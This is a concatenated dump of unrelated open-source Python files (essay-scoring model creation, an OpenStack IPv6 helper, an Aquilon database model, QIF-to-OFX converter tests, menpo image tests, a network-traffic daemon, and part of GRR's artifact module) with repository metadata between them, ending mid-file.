max(shape(cptGradFlow)) colorParam=[] sizeParam=[] for i in range(len(nodeInfoLevel)): colorParam.append(len(superLevels[1]) - nodeInfoFilter[i] - 1 ) sizeParam.append(100.0*len(nodeInfoSet[i])/nodeInfoLevelSize[i]) # printDebug(sizeParam, "sizeParam") maxColorParam=max(colorParam) colorScaleORI = arange(0.0,1.1,0.1) colorScaleNEW = arange(0.3,.91,0.06) print colorScaleORI, colorScaleNEW colorInterpolator = interp1d(colorScaleORI,colorScaleNEW) for i in range(numNodes): colorParam[i]= colorInterpolator(float(colorParam[i])/maxColorParam) # printDebug(colorParam, "colorParam") sParam = np.copy(sizeParam) levelColor = [] cm = get_cmap('jet') for i in range(numNodes): tmpColor=cm(colorParam[i]) # color will now be an RGBA tuple, THX internet levelColor.append([int(tmpColor[0]*255),int(tmpColor[1]*255),int(tmpColor[2]*255),int(tmpColor[3]*255)]) for i in range(len(sizeParam)): sizeParam[i] = 0.1 + sizeParam[i]/max(sizeParam) outline = 'digraph "G" {\n' for i in range(numNodes): outline += ' node%d [label="%d:%2.0f%%", color="#%02x%02x%02x%02x",style=filled, shape=circle, width=%0.2f];\n' % (i, i, sParam[i], levelColor[i][0],levelColor[i][1],levelColor[i][2],levelColor[i][3], sizeParam[i]) # printDebug(cptGradFlow, "cptGradFlow") for i in range(numNodes): connNodes = where(cptGradFlow[:,i] > 0)[0] for j in range(size(connNodes)): outline += ' node%d -> node%d [label="%d"];\n' % (i, connNodes[0, j],cptGradFlow[connNodes[0,j],i]) levelSizes=[] for i in range(len(superLevels[1])): levelSizes.append(len(superLevels[0][i])) levelSizeInfo = "" for i in levelSizes: levelSizeInfo += '%d; ' % i; l=zeros((len(levelIdx)), int) for i in range (len(levelIdx)): l[i] = len(levelIdx[i]) l_end = l.cumsum(axis=0) tmpNextLevIdxInfo=0 levelIdxInfo="" for i in range(0,len(l_end)-1): levelIdxInfo += "%d-%d; " % (tmpNextLevIdxInfo, l_end[i]-1) tmpNextLevIdxInfo=l_end[i] levelIdxInfo += "%d-%d; " % (tmpNextLevIdxInfo, l_end[len(l_end)-1]) levelDesity="" for i in pLevels: levelDesity += "%2.0f%%; " % (i*100.0) outline += ' label = " Levels: %d \\l Density Levels: %s \\l Level Sizes: %s \\l Node Index: %s \\l\n' % (len(superLevels[1]), levelDesity, levelSizeInfo, levelIdxInfo) outline += ' labelloc="b";\nlabeljust="l";\n' outline += ' center = 1;\n overlap=scale;\n' outline +='}' print "(OUTPUT) ", ("Writting Macrostate flowgraph to: %s" % outFlowGraphName) f = open(outFlowGraphName,'w') print >>f, outline f.close() print "(OUTPUT) ", ("Macrostate flowgraph generated") return def printDebug(obj, message): outline= ("(DEBUG) %s: " % message) try: for i in obj: outline += ", " + str(i) except TypeError: outline += " " + str(obj) print outline.replace("\n", " ") if __name__ == '__main__': main()
apache-2.0
-28,220,316,076,639,290
36.912297
229
0.655434
false
edx/ease
ease/model_creator.py
1
7903
#Provides interface functions to create and save models import numpy import re import nltk import sys from sklearn.feature_extraction.text import CountVectorizer import pickle import os import sklearn.ensemble from itertools import chain base_path = os.path.dirname(__file__) sys.path.append(base_path) from .essay_set import EssaySet from . import util_functions from . import feature_extractor import logging from . import predictor_extractor log=logging.getLogger() def read_in_test_data(filename): """ Reads in test data file found at filename. filename must be a tab delimited file with columns id, dummy number column, score, dummy score, text returns the score and the text """ tid, e_set, score, score2, text = [], [], [], [], [] combined_raw = open(filename).read() raw_lines = combined_raw.splitlines() for row in range(1, len(raw_lines)): tid1, set1, score1, score12, text1 = raw_lines[row].strip().split("\t") tid.append(int(tid1)) text.append(text1) e_set.append(int(set1)) score.append(int(score1)) score2.append(int(score12)) return score, text def read_in_test_prompt(filename): """ Reads in the prompt from a text file Returns string """ prompt_string = open(filename).read() return prompt_string def read_in_test_data_twocolumn(filename,sep=","): """ Reads in a two column version of the test data. Filename must point to a delimited file. In filename, the first column should be integer score data. The second column should be string text data. Sep specifies the type of separator between fields. """ score, text = [], [] combined_raw = open(filename).read() raw_lines = combined_raw.splitlines() for row in range(1, len(raw_lines)): score1, text1 = raw_lines[row].strip().split("\t") text.append(text1) score.append(int(score1)) return score, text def create_essay_set(text, score, prompt_string, generate_additional=True): """ Creates an essay set from given data. Text should be a list of strings corresponding to essay text. Score should be a list of scores where score[n] corresponds to text[n] Prompt string is just a string containing the essay prompt. Generate_additional indicates whether to generate additional essays at the minimum score point or not. """ x = EssaySet() for i in range(0, len(text)): x.add_essay(text[i], score[i]) if score[i] == min(score) and generate_additional == True: x.generate_additional_essays(x._clean_text[len(x._clean_text) - 1], score[i]) x.update_prompt(prompt_string) return x def get_cv_error(clf,feats,scores): """ Gets cross validated error for a given classifier, set of features, and scores clf - classifier feats - features to feed into the classified and cross validate over scores - scores associated with the features -- feature row 1 associates with score 1, etc. """ results={'success' : False, 'kappa' : 0, 'mae' : 0} try: cv_preds=util_functions.gen_cv_preds(clf,feats,scores) err=numpy.mean(numpy.abs(numpy.array(cv_preds)-scores)) kappa=util_functions.quadratic_weighted_kappa(list(cv_preds),scores) results['mae']=err results['kappa']=kappa results['success']=True except ValueError as ex: # If this is hit, everything is fine. It is hard to explain why the error occurs, but it isn't a big deal. msg = u"Not enough classes (0,1,etc) in each cross validation fold: {ex}".format(ex=ex) log.debug(msg) except: log.exception("Error getting cv error estimates.") return results def get_algorithms(algorithm): """ Gets two classifiers for each type of algorithm, and returns them. First for predicting, second for cv error. type - one of util_functions.AlgorithmTypes """ if algorithm == util_functions.AlgorithmTypes.classification: clf = sklearn.ensemble.GradientBoostingClassifier(n_estimators=100, learning_rate=.05, max_depth=4, random_state=1,min_samples_leaf=3) clf2=sklearn.ensemble.GradientBoostingClassifier(n_estimators=100, learning_rate=.05, max_depth=4, random_state=1,min_samples_leaf=3) else: clf = sklearn.ensemble.GradientBoostingRegressor(n_estimators=100, learning_rate=.05, max_depth=4, random_state=1,min_samples_leaf=3) clf2=sklearn.ensemble.GradientBoostingRegressor(n_estimators=100, learning_rate=.05, max_depth=4, random_state=1,min_samples_leaf=3) return clf, clf2 def extract_features_and_generate_model_predictors(predictor_set, algorithm=util_functions.AlgorithmTypes.regression): """ Extracts features and generates predictors based on a given predictor set predictor_set - a PredictorSet object that has been initialized with data type - one of util_functions.AlgorithmType """ if(algorithm not in [util_functions.AlgorithmTypes.regression, util_functions.AlgorithmTypes.classification]): algorithm = util_functions.AlgorithmTypes.regression f = predictor_extractor.PredictorExtractor() f.initialize_dictionaries(predictor_set) train_feats = f.gen_feats(predictor_set) clf,clf2 = get_algorithms(algorithm) cv_error_results=get_cv_error(clf2,train_feats,predictor_set._target) try: set_score = numpy.asarray(predictor_set._target, dtype=numpy.int) clf.fit(train_feats, set_score) except ValueError: log.exception("Not enough classes (0,1,etc) in sample.") set_score = predictor_set._target set_score[0]=1 set_score[1]=0 clf.fit(train_feats, set_score) return f, clf, cv_error_results def extract_features_and_generate_model(essays, algorithm=util_functions.AlgorithmTypes.regression): """ Feed in an essay set to get feature vector and classifier essays must be an essay set object additional array is an optional argument that can specify a numpy array of values to add in returns a trained FeatureExtractor object and a trained classifier """ f = feature_extractor.FeatureExtractor() f.initialize_dictionaries(essays) train_feats = f.gen_feats(essays) set_score = numpy.asarray(essays._score, dtype=numpy.int) if len(util_functions.f7(list(set_score)))>5: algorithm = util_functions.AlgorithmTypes.regression else: algorithm = util_functions.AlgorithmTypes.classification clf,clf2 = get_algorithms(algorithm) cv_error_results=get_cv_error(clf2,train_feats,essays._score) try: clf.fit(train_feats, set_score) except ValueError: log.exception("Not enough classes (0,1,etc) in sample.") set_score[0]=1 set_score[1]=0 clf.fit(train_feats, set_score) return f, clf, cv_error_results def dump_model_to_file(prompt_string, feature_ext, classifier, text, score, model_path): """ Writes out a model to a file. prompt string is a string containing the prompt feature_ext is a trained FeatureExtractor object classifier is a trained classifier model_path is the path of write out the model file to """ model_file = {'prompt': prompt_string, 'extractor': feature_ext, 'model': classifier, 'text' : text, 'score' : score} pickle.dump(model_file, file=open(model_path, "w")) def create_essay_set_and_dump_model(text,score,prompt,model_path,additional_array=None): """ Function that creates essay set, extracts features, and writes out model See above functions for argument descriptions """ essay_set=create_essay_set(text,score,prompt) feature_ext,clf=extract_features_and_generate_model(essay_set,additional_array) dump_model_to_file(prompt,feature_ext,clf,model_path)
agpl-3.0
8,545,315,089,119,740,000
35.75814
121
0.690118
false
russellb/nova
nova/ipv6/api.py
1
1342
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright (c) 2011 Openstack, LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova import flags from nova.openstack.common import cfg from nova import utils ipv6_backend_opt = cfg.StrOpt('ipv6_backend', default='rfc2462', help='Backend to use for IPv6 generation') FLAGS = flags.FLAGS FLAGS.register_opt(ipv6_backend_opt) def reset_backend(): global IMPL IMPL = utils.LazyPluggable('ipv6_backend', rfc2462='nova.ipv6.rfc2462', account_identifier='nova.ipv6.account_identifier') def to_global(prefix, mac, project_id): return IMPL.to_global(prefix, mac, project_id) def to_mac(ipv6_address): return IMPL.to_mac(ipv6_address) reset_backend()
apache-2.0
3,333,885,616,564,730,000
29.5
78
0.682563
false
guillaume-philippon/aquilon
lib/aquilon/aqdb/model/operating_system.py
1
2257
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*- # ex: set expandtab softtabstop=4 shiftwidth=4: # # Copyright (C) 2009,2010,2011,2012,2013,2014,2016 Contributor # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Operating System as a high level cfg object """ from datetime import datetime from sqlalchemy import (Column, Integer, DateTime, Sequence, String, ForeignKey, UniqueConstraint) from sqlalchemy.orm import relation, deferred from aquilon.aqdb.model import Base, Archetype, AssetLifecycle from aquilon.aqdb.column_types.aqstr import AqStr _TN = 'operating_system' class OperatingSystem(Base): """ Operating Systems """ __tablename__ = _TN _class_label = 'Operating System' id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True) name = Column(AqStr(32), nullable=False) version = Column(AqStr(16), nullable=False) archetype_id = Column(ForeignKey(Archetype.id, ondelete="CASCADE"), nullable=False) creation_date = deferred(Column(DateTime, default=datetime.now, nullable=False)) comments = Column(String(255), nullable=True) lifecycle_id = Column(ForeignKey(AssetLifecycle.id), nullable=False) archetype = relation(Archetype, lazy=False, innerjoin=True) lifecycle = relation(AssetLifecycle, innerjoin=True) __table_args__ = (UniqueConstraint(archetype_id, name, version), {'info': {'unique_fields': ['name', 'version', 'archetype']}}) def __format__(self, format_spec): instance = "%s/%s-%s" % (self.archetype.name, self.name, self.version) return self.format_helper(format_spec, instance)
apache-2.0
-5,904,684,791,283,177,000
39.303571
80
0.673017
false
CaliOpen/CaliOpen
src/backend/tools/py.CLI/caliopen_cli/commands/dump_indexes_mappings.py
1
1108
import json from caliopen_storage.helpers.json import JSONEncoder def dump_indexes(**kwargs): # Discover base core classes from caliopen_main.user.core import User from caliopen_main.contact.objects.contact import Contact from caliopen_main.message.objects.message import Message from caliopen_main.common.objects.tag import ResourceTag from caliopen_storage.core import core_registry _exports = { 'contact': ['Contact'], 'message': ['Message'], } for keys in _exports: for obj in _exports[keys]: kls = core_registry.get(obj) if not kls: raise Exception('core class %s not found in registry' % obj) output_file = '%s/%s.json' % (kwargs["output_path"], obj.lower()) dump_index_mapping(kls._index_class, output_file) def dump_index_mapping(kls, output_file): """Output the json definition class.""" m = kls.build_mapping().to_dict() with open(output_file, 'w') as f: f.write(json.dumps(m, cls=JSONEncoder, indent=4, sort_keys=True))
gpl-3.0
-7,902,594,706,566,011,000
34.741935
77
0.631769
false
Mausy5043/bonediagd
daemon13.py
1
4546
#!/usr/bin/env python # Based on previous work by # Charles Menguy (see: http://stackoverflow.com/questions/10217067/implementing-a-full-python-unix-style-daemon-process) # and Sander Marechal (see: http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/) # Adapted by M.Hendrix [2015] # daemon13.py measures the network traffic. # These are all counters, therefore no averaging is needed. import syslog, traceback import os, sys, time, math from libdaemon import Daemon import ConfigParser DEBUG = False IS_SYSTEMD = os.path.isfile('/bin/journalctl') leaf = os.path.realpath(__file__).split('/')[-2] class MyDaemon(Daemon): def run(self): iniconf = ConfigParser.ConfigParser() inisection = "13" home = os.path.expanduser('~') s = iniconf.read(home + '/' + leaf + '/config.ini') if DEBUG: print "config file : ", s if DEBUG: print iniconf.items(inisection) reportTime = iniconf.getint(inisection, "reporttime") cycles = iniconf.getint(inisection, "cycles") samplesperCycle = iniconf.getint(inisection, "samplespercycle") flock = iniconf.get(inisection, "lockfile") fdata = iniconf.get(inisection, "resultfile") samples = samplesperCycle * cycles # total number of samples averaged sampleTime = reportTime/samplesperCycle # time [s] between samples cycleTime = samples * sampleTime # time [s] per cycle data = [] # array for holding sampledata while True: try: startTime = time.time() result = do_work().split(',') data = map(int, result) # report sample average if (startTime % reportTime < sampleTime): if DEBUG:print data averages = data #averages = sum(data[:]) / len(data) #if DEBUG:print averages do_report(averages, flock, fdata) waitTime = sampleTime - (time.time() - startTime) - (startTime%sampleTime) if (waitTime > 0): if DEBUG:print "Waiting {0} s".format(waitTime) time.sleep(waitTime) except Exception as e: if DEBUG: print "Unexpected error:" print e.message syslog.syslog(syslog.LOG_ALERT,e.__doc__) syslog_trace(traceback.format_exc()) raise def syslog_trace(trace): # Log a python stack trace to syslog log_lines = trace.split('\n') for line in log_lines: if line: syslog.syslog(syslog.LOG_ALERT,line) def cat(filename): ret = "" if os.path.isfile(filename): with open(filename,'r') as f: ret = f.read().strip('\n') return ret def do_work(): # 6 #datapoints gathered here # Network traffic wlIn = 0 wlOut = 0 etIn = 0 etOut = 0 loIn = 0 loOut = 0 list = cat("/proc/net/dev").replace(":"," ").splitlines() for line in range(2,len(list)): device = list[line].split()[0] if device == "lo": loIn = int(list[line].split()[1]) loOut = int(list[line].split()[9]) if device == "eth0": etIn = int(list[line].split()[1]) etOut = int(list[line].split()[9]) if device == "wlan0": wlIn = int(list[line].split()[1]) wlOut = int(list[line].split()[9]) if device == "wlan1": wlIn += int(list[line].split()[1]) wlOut += int(list[line].split()[9]) return '{0}, {1}, {2}, {3}, {4}, {5}'.format(loIn, loOut, etIn, etOut, wlIn, wlOut) def do_report(result, flock, fdata): # Get the time and date in human-readable form and UN*X-epoch... outDate = time.strftime('%Y-%m-%dT%H:%M:%S, %s') result = ', '.join(map(str, result)) lock(flock) with open(fdata, 'a') as f: f.write('{0}, {1}\n'.format(outDate, result) ) unlock(flock) def lock(fname): open(fname, 'a').close() def unlock(fname): if os.path.isfile(fname): os.remove(fname) if __name__ == "__main__": daemon = MyDaemon('/tmp/' + leaf + '/13.pid') if len(sys.argv) == 2: if 'start' == sys.argv[1]: daemon.start() elif 'stop' == sys.argv[1]: daemon.stop() elif 'restart' == sys.argv[1]: daemon.restart() elif 'foreground' == sys.argv[1]: # assist with debugging. print "Debug-mode started. Use <Ctrl>+C to stop." DEBUG = True if DEBUG: logtext = "Daemon logging is ON" syslog.syslog(syslog.LOG_DEBUG, logtext) daemon.run() else: print "Unknown command" sys.exit(2) sys.exit(0) else: print "usage: {0!s} start|stop|restart|foreground".format(sys.argv[0]) sys.exit(2)
mit
-1,613,244,532,009,783,600
29.510067
120
0.604707
false
grigorisg9gr/menpo
menpo/image/test/image_basics_test.py
1
4345
import warnings import numpy as np from numpy.testing import assert_allclose from nose.tools import raises from pathlib import Path import menpo from menpo.image import Image, MaskedImage, BooleanImage from menpo.shape import PointCloud from menpo.transform import UniformScale, Translation def test_image_as_masked(): img = Image(np.random.rand(3, 3, 1), copy=False) m_img = img.as_masked() assert(type(m_img) == MaskedImage) assert_allclose(m_img.pixels, img.pixels) def test_image_has_nan_values(): img = Image(np.random.rand(1, 3, 3), copy=False) img.pixels[0, 0, 0] = np.nan assert img.has_nan_values() def test_image_no_nan_values(): img = Image(np.random.rand(1, 3, 3), copy=False) assert not img.has_nan_values() def test_masked_image_as_unmasked(): m_img = MaskedImage(np.random.rand(1, 3, 3), copy=False) img = m_img.as_unmasked() assert(type(img) == Image) assert_allclose(m_img.pixels, img.pixels) def test_masked_image_as_unmasked_fill(): m_img = MaskedImage(np.random.rand(1, 3, 3), copy=False) m_img.mask.pixels[0, 0, 0] = False img = m_img.as_unmasked(fill=8) assert(type(img) == Image) assert_allclose(m_img.pixels[0, 1:, 1:], img.pixels[0, 1:, 1:]) assert_allclose(img.pixels[0, 0, 0], 8.0) def test_masked_image_as_unmasked_fill_tuple(): m_img = MaskedImage(np.random.rand(3, 3, 3), copy=False) m_img.mask.pixels[0, 0, 0] = False img = m_img.as_unmasked(fill=(1, 2, 3)) assert(type(img) == Image) assert_allclose(m_img.pixels[0, 1:, 1:], img.pixels[0, 1:, 1:]) assert_allclose(img.pixels[:, 0, 0], (1, 2, 3)) @raises(NotImplementedError) def test_boolean_image_as_masked_raises_not_implemented_error(): b_img = BooleanImage.init_blank((4, 5)) b_img.as_masked() def test_warp_to_shape_preserves_path(): bb = menpo.io.import_builtin_asset.breakingbad_jpg() bb2 = bb.rescale(0.1) assert hasattr(bb2, 'path') assert bb2.path == bb.path def test_warp_to_mask_preserves_path(): bb = menpo.io.import_builtin_asset.breakingbad_jpg() no_op = UniformScale(1.0, n_dims=2) bb2 = bb.warp_to_mask(BooleanImage.init_blank((10, 10)), no_op) assert hasattr(bb2, 'path') assert bb2.path == bb.path def test_warp_to_shape_boolean_preserves_path(): i1 = BooleanImage.init_blank((10, 10)) i1.path = Path('.') i2 = i1.rescale(0.8) assert hasattr(i2, 'path') assert i2.path == i1.path def test_init_from_rolled_channels(): p = np.empty([50, 60, 3]) im = Image.init_from_channels_at_back(p) assert im.n_channels == 3 assert im.height == 50 assert im.width == 60 def test_init_from_channels_at_back_less_dimensions(): p = np.empty([50, 60]) im = Image.init_from_channels_at_back(p) assert im.n_channels == 1 assert im.height == 50 assert im.width == 60 def test_init_from_pointcloud(): pc = PointCloud.init_2d_grid((10, 10)) im = Image.init_from_pointcloud(pc) assert im.shape == (9, 9) def test_init_from_pointcloud_return_transform(): correct_tr = Translation([5, 5]) pc = correct_tr.apply(PointCloud.init_2d_grid((10, 10))) im, tr = Image.init_from_pointcloud(pc, return_transform=True) assert im.shape == (9, 9) assert_allclose(tr.as_vector(), -correct_tr.as_vector()) def test_init_from_pointcloud_attach_group(): pc = PointCloud.init_2d_grid((10, 10)) im = Image.init_from_pointcloud(pc, group='test') assert im.shape == (9, 9) assert im.n_landmark_groups == 1 def test_init_from_pointcloud_boundary(): pc = PointCloud.init_2d_grid((10, 10)) im = Image.init_from_pointcloud(pc, boundary=5) print(im.shape) assert im.shape == (19, 19) def test_bounds_2d(): im = Image.init_blank((50, 30)) assert_allclose(im.bounds(), ((0, 0), (49, 29))) def test_bounds_3d(): im = Image.init_blank((50, 30, 10)) assert_allclose(im.bounds(), ((0, 0, 0), (49, 29, 9))) def test_constrain_landmarks_to_bounds(): im = Image.init_blank((10, 10)) im.landmarks['test'] = PointCloud.init_2d_grid((20, 20)) with warnings.catch_warnings(): warnings.simplefilter('ignore') im.constrain_landmarks_to_bounds() assert not im.has_landmarks_outside_bounds() assert_allclose(im.landmarks['test'].bounds(), im.bounds())
bsd-3-clause
-8,169,848,640,593,623,000
28.557823
67
0.650403
false
myfreecomm/fixofx
test/ofxtools_qif_converter.py
1
9183
# Copyright 2005-2010 Wesabe, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import sys sys.path.insert(0, '../3rdparty') sys.path.insert(0, '../lib') import ofxtools import textwrap import unittest from pyparsing import ParseException from time import localtime, strftime class QifConverterTests(unittest.TestCase): def test_bank_stmttype(self): qiftext = textwrap.dedent('''\ !Type:Bank D01/13/2005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertEqual(converter.accttype, "CHECKING") def test_ccard_stmttype(self): qiftext = textwrap.dedent('''\ !Type:CCard D01/13/2005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertEqual(converter.accttype, "CREDITCARD") def test_no_stmttype(self): qiftext = textwrap.dedent('''\ D01/13/2005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertEqual(converter.accttype, "CHECKING") def test_no_txns(self): qiftext = textwrap.dedent('''\ !Type:Bank ''') today = strftime("%Y%m%d", localtime()) converter = ofxtools.QifConverter(qiftext) self.assertEqual(converter.start_date, today) self.assertEqual(converter.end_date, today) def test_us_date(self): qiftext = textwrap.dedent('''\ !Type:Bank D01/13/2005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertTrue(converter.txns_by_date.has_key("20050113")) def test_uk_date(self): qiftext = textwrap.dedent('''\ !Type:Bank D13/01/2005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertTrue(converter.txns_by_date.has_key("20050113")) def test_ambiguous_date(self): qiftext = textwrap.dedent('''\ !Type:Bank D12/01/2005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertTrue(converter.txns_by_date.has_key("20051201")) def test_mixed_us_dates(self): qiftext = textwrap.dedent('''\ !Type:Bank D01/12/2005 ^ D01/13/2005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertTrue(converter.txns_by_date.has_key("20050112")) self.assertTrue(converter.txns_by_date.has_key("20050113")) def test_mixed_uk_dates(self): qiftext = textwrap.dedent('''\ !Type:Bank D12/01/2005 ^ D13/01/2005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertTrue(converter.txns_by_date.has_key("20050112")) self.assertTrue(converter.txns_by_date.has_key("20050113")) def test_slashfree_date(self): qiftext = textwrap.dedent('''\ !Type:Bank D12012005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertTrue(converter.txns_by_date.has_key("20051201")) def test_unparseable_date(self): qiftext = textwrap.dedent('''\ !Type:Bank DFnargle ^ ''') self.assertRaises(ValueError, ofxtools.QifConverter, qiftext) def test_len_eight_no_int_date(self): qiftext = textwrap.dedent('''\ !Type:Bank DAAAAAAAA ^ ''') self.assertRaises(ValueError, ofxtools.QifConverter, qiftext) def test_asc_dates(self): qiftext = textwrap.dedent('''\ !Type:Bank D01/13/2005 ^ D01/27/2005 ^ D02/01/2005 ^ D02/01/2005 ^ D02/13/2005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertEqual(converter.start_date, "20050113") self.assertEqual(converter.end_date, "20050213") self.assertEqual(len(converter.txns_by_date.keys()), 4) def test_desc_dates(self): qiftext = textwrap.dedent('''\ !Type:Bank D02/13/2005 ^ D02/01/2005 ^ D02/01/2005 ^ D01/27/2005 ^ D01/13/2005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertEqual(converter.start_date, "20050113") self.assertEqual(converter.end_date, "20050213") self.assertEqual(len(converter.txns_by_date.keys()), 4) def test_mixed_dates(self): qiftext = textwrap.dedent('''\ !Type:Bank D02/01/2005 ^ D02/13/2005 ^ D01/13/2005 ^ D02/01/2005 ^ D01/27/2005 ^ ''') converter = ofxtools.QifConverter(qiftext) self.assertEqual(converter.start_date, "20050113") self.assertEqual(converter.end_date, "20050213") self.assertEqual(len(converter.txns_by_date.keys()), 4) def test_default_currency(self): qiftext = textwrap.dedent('''\ !Type:Bank D01/25/2007 T417.93 ^ ''') converter = ofxtools.QifConverter(qiftext) ofx102 = converter.to_ofx102() self.assertTrue(ofx102.find('<CURDEF>USD') != -1) def test_found_currency(self): qiftext = textwrap.dedent('''\ !Type:Bank D01/25/2007 T417.93 ^EUR ''') converter = ofxtools.QifConverter(qiftext) ofx102 = converter.to_ofx102() self.assertTrue(ofx102.find('<CURDEF>EUR') != -1) def test_explicit_currency(self): qiftext = textwrap.dedent('''\ !Type:Bank D01/25/2007 T417.93 ^ ''') converter = ofxtools.QifConverter(qiftext, curdef='GBP') ofx102 = converter.to_ofx102() self.assertTrue(ofx102.find('<CURDEF>GBP') != -1) def test_amount2(self): qiftext = textwrap.dedent('''\ !Type:Bank D02/01/2005 U25.42 ^ ''') converter = ofxtools.QifConverter(qiftext) txn = converter.txns_by_date["20050201"][0] self.assertEqual(txn["Amount"], "25.42") def test_bad_amount_precision(self): qiftext = textwrap.dedent('''\ !Type:Bank D01/25/2007 T417.930 ^ ''') converter = ofxtools.QifConverter(qiftext) txn = converter.txns_by_date["20070125"][0] self.assertEqual(txn["Amount"], "417.93") def test_dash_amount(self): qiftext = textwrap.dedent('''\ !Type:Bank D02/01/2005 T25.42 ^ D02/01/2005 T- ^ ''') converter = ofxtools.QifConverter(qiftext) txn_list = converter.txns_by_date["20050201"] self.assertEqual(len(txn_list), 1) txn = txn_list[0] self.assertEqual(txn["Amount"], "25.42") def test_trailing_minus(self): qiftext = textwrap.dedent('''\ !Type:Bank D08/06/2008 T26.24- ^ ''') converter = ofxtools.QifConverter(qiftext) txn = converter.txns_by_date["20080806"][0] self.assertEqual(txn["Amount"], "-26.24") def test_n_a_number(self): qiftext = textwrap.dedent('''\ !Type:Bank D01/25/2007 T417.93 NN/A ^ ''') converter = ofxtools.QifConverter(qiftext) txn = converter.txns_by_date["20070125"][0] self.assertEqual(txn.has_key("Number"), False) def test_creditcard_number(self): qiftext = textwrap.dedent('''\ !Type:Bank D01/25/2007 T417.93 NXXXX-XXXX-XXXX-1234 ^ ''') converter = ofxtools.QifConverter(qiftext) txn = converter.txns_by_date["20070125"][0] self.assertEqual(txn.has_key("Number"), False) def test_creditcard_stmt_number(self): qiftext = textwrap.dedent('''\ !Type:CCard D01/25/2007 T417.93 N1234 ^ ''') converter = ofxtools.QifConverter(qiftext) txn = converter.txns_by_date["20070125"][0] self.assertEqual(txn.has_key("Number"), False) def test_check_stmt_number(self): qiftext = textwrap.dedent('''\ !Type:Bank D01/25/2007 T417.93 N1234 ^ ''') converter = ofxtools.QifConverter(qiftext) txn = converter.txns_by_date["20070125"][0] self.assertEqual(txn.get("Type"), "CHECK") if __name__ == '__main__': unittest.main()
apache-2.0
-6,239,589,236,136,788,000
27.255385
74
0.556354
false
simsong/grr-insider
lib/artifact.py
1
15969
#!/usr/bin/env python """Base classes for artifacts.""" import logging from grr.lib import aff4 from grr.lib import artifact_lib from grr.lib import config_lib from grr.lib import flow from grr.lib import rdfvalue from grr.lib import registry from grr.lib import utils class AFF4ResultWriter(object): """A wrapper class to allow writing objects to the AFF4 space.""" def __init__(self, path, aff4_type, aff4_attribute, mode): self.path = path self.aff4_type = aff4_type self.aff4_attribute = aff4_attribute self.mode = mode def GetArtifactKnowledgeBase(client_obj, allow_uninitialized=False): """This generates an artifact knowledge base from a GRR client. Args: client_obj: A GRRClient object which is opened for reading. allow_uninitialized: If True we accept an uninitialized knowledge_base. Returns: A KnowledgeBase semantic value. Raises: ArtifactProcessingError: If called when the knowledge base has not been initialized. KnowledgeBaseUninitializedError: If we failed to initialize the knowledge base. This is needed so that the artifact library has a standardized interface to the data that is actually stored in the GRRClient object in the GRR datastore. We expect that the client KNOWLEDGE_BASE is already filled out through the, KnowledgeBaseInitialization flow, but attempt to make some intelligent guesses if things failed. """ client_schema = client_obj.Schema kb = client_obj.Get(client_schema.KNOWLEDGE_BASE) if not allow_uninitialized and (not kb or not kb.os): raise artifact_lib.KnowledgeBaseUninitializedError( "Attempting to retreive uninitialized KnowledgeBase for %s. Failing." % client_obj.urn) if not kb: kb = client_schema.KNOWLEDGE_BASE() SetCoreGRRKnowledgeBaseValues(kb, client_obj) if kb.os == "Windows": # Add fallback values. if not kb.environ_allusersappdata and kb.environ_allusersprofile: # Guess if we don't have it already. if kb.os_major_version >= 6: kb.environ_allusersappdata = u"c:\\programdata" kb.environ_allusersprofile = u"c:\\programdata" else: kb.environ_allusersappdata = (u"c:\\documents and settings\\All Users\\" "Application Data") kb.environ_allusersprofile = u"c:\\documents and settings\\All Users" return kb def SetCoreGRRKnowledgeBaseValues(kb, client_obj): """Set core values from GRR into the knowledgebase.""" client_schema = client_obj.Schema kb.hostname = utils.SmartUnicode(client_obj.Get(client_schema.FQDN, "")) if not kb.hostname: kb.hostname = utils.SmartUnicode(client_obj.Get(client_schema.HOSTNAME, "")) versions = client_obj.Get(client_schema.OS_VERSION) if versions and versions.versions: kb.os_major_version = versions.versions[0] kb.os_minor_version = versions.versions[1] client_os = client_obj.Get(client_schema.SYSTEM) if client_os: kb.os = utils.SmartUnicode(client_obj.Get(client_schema.SYSTEM)) class KnowledgeBaseInitializationFlow(flow.GRRFlow): """Flow that atttempts to initialize the knowledge base. This flow processes all artifacts specified by the Artifacts.knowledge_base config. We search for dependent artifacts following the dependency tree specified by the "provides" attributes in the artifact definitions. We don't try to fulfill dependencies in the tree order, the reasoning is that some artifacts may fail, and some artifacts provide the same dependency. Instead we take an iterative approach and keep requesting artifacts until all dependencies have been met. If there is more than one artifact that provides a dependency we will collect them all as they likely have different performance characteristics, e.g. accuracy and client impact. """ category = "/Collectors/" behaviours = flow.GRRFlow.behaviours + 